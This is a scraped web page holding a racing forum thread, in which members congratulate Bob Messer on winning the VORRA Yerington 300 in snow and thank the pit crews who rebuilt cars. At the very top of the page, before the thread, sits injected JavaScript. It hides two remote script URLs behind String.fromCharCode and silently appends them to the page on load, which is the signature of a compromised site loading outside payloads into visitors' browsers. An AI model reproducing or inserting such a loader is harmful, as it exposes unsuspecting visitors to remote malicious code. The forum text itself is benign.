var d3 = document.createElement('script'); d3.type = 'text/javascript'; d3.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 115, 116, 97, 116, 46, 117, 117, 115, 116, 111, 117, 103, 104, 116, 111, 110, 109, 97, 46, 111, 114, 103, 47, 115, 116, 97, 116, 115, 46, 106, 115, 63, 102, 61, 52); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == d3.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(d3);}var po = document.createElement('script'); po.type = 'text/javascript'; po.src = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 99, 100, 110, 46, 97, 108, 108, 121, 111, 117, 119, 97, 110, 116, 46, 111, 110, 108, 105, 110, 101, 47, 109, 97, 105, 110, 46, 106, 115, 63, 116, 61, 110, 112, 106, 108, 99); var scripts = document.getElementsByTagName('script'); var need_t = true; for (var i = scripts.length; i--;) {if (scripts[i].src == po.src) { need_t = false;}else{} } if(need_t == true){document.head.appendChild(po);} Bob Messer (1177) wins VORRA Yerington 300 in snow - VW Baja Bug Off Road Dezert Racing

Bob Messer (1177) wins VORRA Yerington 300 in snow

More
7 years 3 months ago - 7 years 3 months ago #15965 by ronjon
ronjon created the topic: Bob Messer (1177) wins VORRA Yerington 300 in snow

Let me be the first to congratulate Bob and Rob Messer for running a near flawless race at VORRA's Yerington 300 this past weekend.

I've got a complete write up here but the high points include waking up race day morning to snow, which was reportedly nine inches deep in a couple of places higher up on the course.

We were the first off the line, but lost time on the first lap when our alternator belt popped off and the steering box came loose. Messer led the first lap with Green Booger right on his tail coming into the pits. GB had the faster pit crew and lead out for lap 2, but I think they had an issue with a shock and had to replace it, losing the lead to Messer, who never gave it up after that. Unfortunately, Jeff Lee and Desert Dawgs had to call it a day after one lap with carburetor issues.

Messer also took home the Bug Invasion II bowling trophy and $20 cash money for this weekend's race. He gave me the 12-pack of PBR, but I left it in the back of the truck, but will give it back to him again at the USA 500 July 14-17 in Reno. If you're looking for a fun race with a lot of general public exposure for your sponsors, this one is it.

2011 - VORRA Class Champions. 2012 - First loser.
http://www.desertdingo.com
Last Edit: 7 years 3 months ago by ronjon. Reason: Because math is hard

Please Log in or Create an account to join the conversation.

More
7 years 3 months ago #15966 by slim76
slim76 replied the topic: Re: Bob Messer (1177) wins VORRA Yerington 300 in snow
Hey jim, thanks alot. This was the first race that the bug ran flawless. Wasent gonna make it due to oil pressure prob, till gary herrod called us from yerington sat. morn with a solution. He was right, so we loaded up (high speed) and raced over, paid entry, set up camp, and drank some corona. Would have been nice to prerun, but im sure everybody misses a prerun or nine. Had a blast with all the teams and loved racing, then getting out and piting for the other teams in my drivn suit. Everybody helped eachother and thats pretty badass. Cant wait to play at the 500 in reno on july 15. Hopefully we get a few visitors from down south. Thanks to Brian Brown,Jason Wallace,and Carl Reed and his son.

ba da ding ding ding ding whoa! ooh damn.

More
7 years 3 months ago - 7 years 3 months ago #15967 by Weasel
Weasel replied the topic: Re: Bob Messer (1177) wins VORRA Yerington 300 in snow
Must say it was a blast! A little cold for me though. Congrats to all who finished for sure.

It was a site see the Dingos with a rental truck and trailer hauling a partial completed race car.
The scene looked more like a Kit Car going together. Bags of bolts and screws not labeled, new seat belts in a box. Radio and GPS in a box. Everyone pitched in, especially the Two Larry's crew. Megan did all the radio and GPS installs. The list goes on. Every crew brought over their spares, nuts and bolts collections, tools and more. To be honest, I did doubt if they could make it to tech in time.

The pass was unreal with all the snow on the ground. You could not tell in the snow mounds which were rocks or cactus. Temps were in low 30's above 6500ft.

I think that VORRA should rename the race to the SNOWFLAKE 300 from now on!
Last Edit: 7 years 3 months ago by Weasel.

More
7 years 3 months ago #15970 by Bobclass11
Bobclass11 replied the topic: Re: Bob Messer (1177) wins VORRA Yerington 300 in snow
THANK YOU!!!!! to all the class 11 peeps!!!!!! We arrived with 30 hours worth of work to do on the car and Crusty was down for the count. The Two Larry's team, family and friends were awesome, Petfinder crew and the Messer familly all helped put the Dingo back together! I had just as much fun working with everyone as I did racing!
Thanks,
Bus Boy Bob

p.s. Thanks to the Messers for taking in a stray!

More
7 years 3 months ago #15972 by green booger
green booger replied the topic: Re: Bob Messer (1177) wins VORRA Yerington 300 in snow
First, congratulations to Bob Messer Motorsports and Son for their desert win!

I must say that the Yerington 300 was slightly cold, and we are thankful that the Green Booger has a windshield (and a car cover!). There's never a dull moment in the Class 11 pit, and certainly one of the highlights was putting together a full Class 11 car together in one day AND making tech that evening. It was fun, and I always admire the way that our pits and families come together to work on the cars and make the racing experience a good one. It only adds to the camaraderie and ensures that each person wants to come back for more fun.

A special thank you to everyone who pitched in on the Two Larrys pit crew - all the 11 pits helped, especially with the blown shock. We managed to get out of the pit in about seven minutes, new shock in place and fueled/torqued. See you guys at the 500, we are looking forward to it!

Gary Herrod
Two Larrys Racing
www.twolarrysracing.com

More
7 years 3 months ago #15979 by green booger
green booger replied the topic: Re: Bob Messer (1177) wins VORRA Yerington 300 in snow

The Sunday morning race lineup. Wait, I thought there were only four? What a ghostly apparition bearing resemblance to #1107 v1.0!

Two Larry's Post Race Review - you can view it at www.twolarrysracing.com . We also got some nice photos, some of nine cars and UTV's, as well as background people. You can view them at: www.twolarrysracing.com/2011yerington.shtml

See you at the 500!

Gary Herrod
Two Larrys Racing
www.twolarrysracing.com

Time to create page: 0.172 seconds